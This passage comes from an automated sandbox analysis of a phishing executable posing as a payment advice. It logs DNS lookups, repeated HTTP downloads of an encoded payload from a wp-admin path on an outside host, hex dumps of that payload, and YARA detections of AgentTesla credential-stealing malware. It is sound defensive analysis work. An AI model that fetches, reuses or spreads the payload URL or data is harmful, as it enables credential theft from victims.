                                                                                                            Nov 21, 2020 21:01:23.548002958 CET53530238.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:24.314101934 CET4956353192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:24.341200113 CET53495638.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:25.116338015 CET5135253192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:25.143321991 CET53513528.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:25.937685966 CET5934953192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:25.964956045 CET53593498.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:26.729284048 CET5708453192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:26.756469011 CET53570848.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:27.597418070 CET5882353192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:27.624511957 CET53588238.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:28.386131048 CET5756853192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:28.421765089 CET53575688.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:28.684792995 CET5054053192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:28.723356009 CET53505408.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:29.306592941 CET5436653192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:29.342573881 CET53543668.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:30.267249107 CET5303453192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:30.302912951 CET53530348.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:31.473155022 CET5776253192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:31.511127949 CET53577628.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:32.508817911 CET5543553192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:32.535972118 CET53554358.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:35.003534079 CET5071353192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:35.053800106 CET53507138.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:50.008140087 CET5613253192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:50.035235882 CET53561328.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:50.220679045 CET5898753192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:50.247831106 CET53589878.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:53.696738958 CET5657953192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:53.723889112 CET53565798.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:58.361183882 CET6063353192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:58.388417006 CET53606338.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:58.530245066 CET6129253192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:58.686759949 CET53612928.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:01:58.846334934 CET6361953192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:01:58.883179903 CET53636198.8.8.8192.168.2.3
                                                                                                            Nov 21, 2020 21:02:28.622030973 CET6493853192.168.2.38.8.8.8
                                                                                                            Nov 21, 2020 21:02:28.649229050 CET53649388.8.8.8192.168.2.3

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                            Nov 21, 2020 21:00:57.806708097 CET192.168.2.38.8.8.80x7ec7Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:00:57.945060015 CET192.168.2.38.8.8.80x99e1Standard query (0)airseaalliance.comA (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:50.008140087 CET192.168.2.38.8.8.80x500fStandard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:50.220679045 CET192.168.2.38.8.8.80xb898Standard query (0)airseaalliance.comA (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:58.361183882 CET192.168.2.38.8.8.80xab39Standard query (0)discord.comA (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:58.530245066 CET192.168.2.38.8.8.80x854cStandard query (0)airseaalliance.comA (IP address)IN (0x0001)

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                            Nov 21, 2020 21:00:57.842557907 CET8.8.8.8192.168.2.30x7ec7No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:00:57.842557907 CET8.8.8.8192.168.2.30x7ec7No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:00:57.842557907 CET8.8.8.8192.168.2.30x7ec7No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:00:57.842557907 CET8.8.8.8192.168.2.30x7ec7No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:00:57.842557907 CET8.8.8.8192.168.2.30x7ec7No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:00:58.102300882 CET8.8.8.8192.168.2.30x99e1No error (0)airseaalliance.com198.136.51.123A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:50.035235882 CET8.8.8.8192.168.2.30x500fNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:50.035235882 CET8.8.8.8192.168.2.30x500fNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:50.035235882 CET8.8.8.8192.168.2.30x500fNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:50.035235882 CET8.8.8.8192.168.2.30x500fNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:50.035235882 CET8.8.8.8192.168.2.30x500fNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:50.247831106 CET8.8.8.8192.168.2.30xb898No error (0)airseaalliance.com198.136.51.123A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:58.388417006 CET8.8.8.8192.168.2.30xab39No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:58.388417006 CET8.8.8.8192.168.2.30xab39No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:58.388417006 CET8.8.8.8192.168.2.30xab39No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:58.388417006 CET8.8.8.8192.168.2.30xab39No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:58.388417006 CET8.8.8.8192.168.2.30xab39No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)
                                                                                                            Nov 21, 2020 21:01:58.686759949 CET8.8.8.8192.168.2.30x854cNo error (0)airseaalliance.com198.136.51.123A (IP address)IN (0x0001)

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • airseaalliance.com

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            0192.168.2.349708198.136.51.12380C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            Nov 21, 2020 21:00:58.233391047 CET1OUTGET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1
                                                                                                            Host: airseaalliance.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Nov 21, 2020 21:00:58.360580921 CET2INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Nov 2020 20:00:58 GMT
                                                                                                            Server: Apache
                                                                                                            Last-Modified: Sat, 21 Nov 2020 16:31:03 GMT
                                                                                                            ETag: "4eb261-110000-5b4a07cb11235"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 1114112
                                                                                                            Data Raw: 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 64 37 39 33 31 30 35 33 37 33 30 32 63 37 66 31 64 35 63 31 39 33 39 31 62 36 66 32 63 35 39 35 63 37 64 35 32 33 34 33 66 33 30 33 66 34 64 34 30 37 39 35 37 32 63 33 31 32 36 33 30 35 37 37 63 37 65 35 34 37 62 37 39 37 37 37 35 31 65 31 38 37 39 35 36 30 66 30 33 36 35 36 30 31 33 31 30 36 62 35 64 37 39 37 63 30 36 31 63 36 65 36 63 37 33 35 36 31 66 37 37 31 37 31 39 30 37 37 61 31 39 35 34 37 32 37 63 30 36 36 62 31 36 31 36 30 61 34 62 37 33 37 30 30 62 36 31 36 39 36 38 31 64 35 34 37 65 37 37 31 39 36 66 31 62 31 65 37 35 32 65 30 62 30 31 30 39 36 66 37 39 31 30 36 65 32 62 36 64 31 37 36 36 36 39 31 64 31 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 30 31 36 35 31 62 31 34 30 63 34 30 37 62 37 34 30 37 36 36 36 63 36 35 31 37 35 64 37 39 37 30 31 37 36 32 31 39 31 38 37 65 32 36 30 66 30 64 30 65 36 61 37 34 31 61 36 37 32 63 36 61 31 39 36 62 36 62 31 62 31 62 37 31 35 35 37 61 37 34 37 62 37 66 31 33 31 66 37 33 35 33 30 37 30 35 36 66 36 32 31 34 31 66 36 61 35 63 37 34 37 30 30 63 31 31 36 39 36 36 37 36 35 65 31 39 37 64 31 35 31 65 30 38 37 62 31 38 35 39 37 65 37 61 32 36 32 63 35 64 36 34 37 36 35 64 37 39 37 35 37 61 37 32 31 33 31 30 37 62 35 64 30 64 30 64 36 33 36 62 31 62 31 38 36 32 35 66 37 35 37 31 30 31 31 31 36 36 36 65 37 38 35 34 31 31 37 31 31 63 31 31 30 66 37 33 31 62 35 38 37 66 37 62 37 61 37 30 30 32 30 61 37 63 35 35 37 35 37 63 37 35 37 35 31 62 31 33 37 61 35 63 30 30 30 64 36 63 36 33 31 35 31 32 36 61 35 33 37 63 37 65 30 36 31 39 36 35 36 66 37 39 35 39 31 31 37 65 31 34 31 66 30 35 37 62 31 37 35 31 37 30 37 34 36 39 61 62 31 39 35 32 36 36 63 36 63 36 36 32 66 32 63 64 62 36 62 64 62 38 39 37 30 30 31 64 66 62 63 30 36 35 31 64 62 37 35 30 33 65 30 66 65 38 64 33 34 65 64 61 36 31 36 64 65 35 32 31 61 66 66 36 62 34 62 39 61 61 31 35 63 30 63
                                                                                                            Data Ascii: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b137a5c000d6c6315126a537c7e0619656f7959117e141f057b1751707469ab195266c6c662f2cdb6bdb897001dfbc0651db7503e0fe8d34eda616de521aff6b4b9aa15c0c


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            1192.168.2.349734198.136.51.12380C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            Nov 21, 2020 21:01:50.377927065 CET1503OUTGET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1
                                                                                                            Host: airseaalliance.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Nov 21, 2020 21:01:50.505517006 CET1505INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Nov 2020 20:01:50 GMT
                                                                                                            Server: Apache
                                                                                                            Last-Modified: Sat, 21 Nov 2020 16:31:03 GMT
                                                                                                            ETag: "4eb261-110000-5b4a07cb11235"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 1114112
                                                                                                            Data Raw: 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 64 37 39 33 31 30 35 33 37 33 30 32 63 37 66 31 64 35 63 31 39 33 39 31 62 36 66 32 63 35 39 35 63 37 64 35 32 33 34 33 66 33 30 33 66 34 64 34 30 37 39 35 37 32 63 33 31 32 36 33 30 35 37 37 63 37 65 35 34 37 62 37 39 37 37 37 35 31 65 31 38 37 39 35 36 30 66 30 33 36 35 36 30 31 33 31 30 36 62 35 64 37 39 37 63 30 36 31 63 36 65 36 63 37 33 35 36 31 66 37 37 31 37 31 39 30 37 37 61 31 39 35 34 37 32 37 63 30 36 36 62 31 36 31 36 30 61 34 62 37 33 37 30 30 62 36 31 36 39 36 38 31 64 35 34 37 65 37 37 31 39 36 66 31 62 31 65 37 35 32 65 30 62 30 31 30 39 36 66 37 39 31 30 36 65 32 62 36 64 31 37 36 36 36 39 31 64 31 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 30 31 36 35 31 62 31 34 30 63 34 30 37 62 37 34 30 37 36 36 36 63 36 35 31 37 35 64 37 39 37 30 31 37 36 32 31 39 31 38 37 65 32 36 30 66 30 64 30 65 36 61 37 34 31 61 36 37 32 63 36 61 31 39 36 62 36 62 31 62 31 62 37 31 35 35 37 61 37 34 37 62 37 66 31 33 31 66 37 33 35 33 30 37 30 35 36 66 36 32 31 34 31 66 36 61 35 63 37 34 37 30 30 63 31 31 36 39 36 36 37 36 35 65 31 39 37 64 31 35 31 65 30 38 37 62 31 38 35 39 37 65 37 61 32 36 32 63 35 64 36 34 37 36 35 64 37 39 37 35 37 61 37 32 31 33 31 30 37 62 35 64 30 64 30 64 36 33 36 62 31 62 31 38 36 32 35 66 37 35 37 31 30 31 31 31 36 36 36 65 37 38 35 34 31 31 37 31 31 63 31 31 30 66 37 33 31 62 35 38 37 66 37 62 37 61 37 30 30 32 30 61 37 63 35 35 37 35 37 63 37 35 37 35 31 62 31 33 37 61 35 63 30 30 30 64 36 63 36 33 31 35 31 32 36 61 35 33 37 63 37 65 30 36 31 39 36 35 36 66 37 39 35 39 31 31 37 65 31 34 31 66 30 35 37 62 31 37 35 31 37 30 37 34 36 39 61 62 31 39 35 32 36 36 63 36 63 36 36 32 66 32 63 64 62 36 62 64 62 38 39 37 30 30 31 64 66 62 63 30 36 35 31 64 62 37 35 30 33 65 30 66 65 38 64 33 34 65 64 61 36 31 36 64 65 35 32 31 61 66 66 36 62 34 62 39 61 61 31 35 63 30 63
                                                                                                            Data Ascii: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b137a5c000d6c6315126a537c7e0619656f7959117e141f057b1751707469ab195266c6c662f2cdb6bdb897001dfbc0651db7503e0fe8d34eda616de521aff6b4b9aa15c0c


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            2192.168.2.349739198.136.51.12380C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            Nov 21, 2020 21:01:58.814641953 CET2737OUTGET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1
                                                                                                            Host: airseaalliance.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Nov 21, 2020 21:01:58.941955090 CET2739INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Nov 2020 20:01:58 GMT
                                                                                                            Server: Apache
                                                                                                            Last-Modified: Sat, 21 Nov 2020 16:31:03 GMT
                                                                                                            ETag: "4eb261-110000-5b4a07cb11235"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 1114112
                                                                                                            Data Raw: 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 65 37 36 33 38 31 33 31 37 30 63 30 39 36 38 36 31 36 66 33 66 31 65 31 37 30 39 30 38 37 30 36 64 37 39 33 31 30 35 33 37 33 30 32 63 37 66 31 64 35 63 31 39 33 39 31 62 36 66 32 63 35 39 35 63 37 64 35 32 33 34 33 66 33 30 33 66 34 64 34 30 37 39 35 37 32 63 33 31 32 36 33 30 35 37 37 63 37 65 35 34 37 62 37 39 37 37 37 35 31 65 31 38 37 39 35 36 30 66 30 33 36 35 36 30 31 33 31 30 36 62 35 64 37 39 37 63 30 36 31 63 36 65 36 63 37 33 35 36 31 66 37 37 31 37 31 39 30 37 37 61 31 39 35 34 37 32 37 63 30 36 36 62 31 36 31 36 30 61 34 62 37 33 37 30 30 62 36 31 36 39 36 38 31 64 35 34 37 65 37 37 31 39 36 66 31 62 31 65 37 35 32 65 30 62 30 31 30 39 36 66 37 39 31 30 36 65 32 62 36 64 31 37 36 36 36 39 31 64 31 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 30 31 36 35 31 62 31 34 30 63 34 30 37 62 37 34 30 37 36 36 36 63 36 35 31 37 35 64 37 39 37 30 31 37 36 32 31 39 31 38 37 65 32 36 30 66 30 64 30 65 36 61 37 34 31 61 36 37 32 63 36 61 31 39 36 62 36 62 31 62 31 62 37 31 35 35 37 61 37 34 37 62 37 66 31 33 31 66 37 33 35 33 30 37 30 35 36 66 36 32 31 34 31 66 36 61 35 63 37 34 37 30 30 63 31 31 36 39 36 36 37 36 35 65 31 39 37 64 31 35 31 65 30 38 37 62 31 38 35 39 37 65 37 61 32 36 32 63 35 64 36 34 37 36 35 64 37 39 37 35 37 61 37 32 31 33 31 30 37 62 35 64 30 64 30 64 36 33 36 62 31 62 31 38 36 32 35 66 37 35 37 31 30 31 31 31 36 36 36 65 37 38 35 34 31 31 37 31 31 63 31 31 30 66 37 33 31 62 35 38 37 66 37 62 37 61 37 30 30 32 30 61 37 63 35 35 37 35 37 63 37 35 37 35 31 62 31 33 37 61 35 63 30 30 30 64 36 63 36 33 31 35 31 32 36 61 35 33 37 63 37 65 30 36 31 39 36 35 36 66 37 39 35 39 31 31 37 65 31 34 31 66 30 35 37 62 31 37 35 31 37 30 37 34 36 39 61 62 31 39 35 32 36 36 63 36 63 36 36 32 66 32 63 64 62 36 62 64 62 38 39 37 30 30 31 64 66 62 63 30 36 35 31 64 62 37 35 30 33 65 30 66 65 38 64 33 34 65 64 61 36 31 36 64 65 35 32 31 61 66 66 36 62 34 62 39 61 61 31 35 63 30 63
                                                                                                            Data Ascii: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b137a5c000d6c6315126a537c7e0619656f7959117e141f057b1751707469ab195266c6c662f2cdb6bdb897001dfbc0651db7503e0fe8d34eda616de521aff6b4b9aa15c0c


                                                                                                            Code Manipulations

                                                                                                            Statistics

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Start time:21:00:56
                                                                                                            Start date:21/11/2020
                                                                                                            Path:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:'C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe'
                                                                                                            Imagebase:0x7ffb73670000
                                                                                                            File size:881008 bytes
                                                                                                            MD5 hash:947EDEB169369AC67C5448CC2F8104A3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Start time:21:01:35
                                                                                                            Start date:21/11/2020
                                                                                                            Path:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            Imagebase:0x7ffb73670000
                                                                                                            File size:881008 bytes
                                                                                                            MD5 hash:947EDEB169369AC67C5448CC2F8104A3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.281256788.00000000006D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.477031647.0000000004A10000.00000004.00000001.sdmp, Author: Joe Security
